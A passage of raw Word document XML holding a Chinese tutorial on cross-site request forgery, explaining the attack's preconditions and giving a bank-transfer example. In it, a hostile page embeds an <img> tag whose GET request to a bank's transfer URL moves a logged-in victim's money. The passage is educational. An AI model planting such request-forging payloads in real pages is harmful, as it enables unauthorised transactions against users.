          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>造成的问题包括：个人隐私泄露以及财产安全。</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下图简单阐述了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击的思想：</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5713629" cy="4744528"/>
            <wp:effectExtent l="19050" t="0" r="1371" b="0"/>
            <wp:docPr id="202" name="图片 3" descr="http://pic002.cnblogs.com/img/hyddd/200904/20090409164531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pic002.cnblogs.com/img/hyddd/200904/2009040916453171.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId273" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5713860" cy="4744720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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从上图可以看出，要完成一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>受害者必须依次完成两个步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>登录受信任网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，并在本地生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>在不登出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的情况下，访问危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</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看到这里，你也许会说：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>如果我不满足以上两个条件中的一个，我就不会受到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。是的，确实如此，但你不能保证以下情况不会发生：</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>你不能保证你登录了一个网站后，不再打开一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>页面并访问另外的网站。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>你不能保证你关闭浏览器了后，你本地的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>立刻过期，你上次的会话已经结束。（事实上，关闭浏览器不能结束一个会话，但大多数人都会错误的认为关闭浏览器就等于退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>结束会话了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>上图中所谓的攻击网站，可能是一个存在其他漏洞的可信任的经常被人访问的网站。</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上面大概地讲了一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击的思想，下面我将用几个例子详细说说具体的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击，这里我以一个银行转账的操作作为例子（仅仅是例子，真实的银行网站没这么傻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</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银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，它以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求来完成银行转账的操作，如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000</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危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，它里面有一段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>img </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>=http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000&gt;</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首先，你登录了银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，然后访问危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，噢，这时你会发现你的银行账户少了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>......</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为什么会这样呢？原因是银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>违反了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>规范，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求更新资源。在访问危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的之前，你已经登录了银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的方式请求第三方资源（这里的第三方就是指银行网站了，原本这是一个合法的请求，但这里被不法分子利用了），所以你的浏览器会带上你的银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求，去获取资源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，结果银行网站服务器收到请求后，认为这是一个更新资源操作（转账操作），所以就立刻进行转账操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>......</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</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为了杜绝上面的问题，银行决定改用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求完成转账操作。</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银行网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">表单如下：　　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
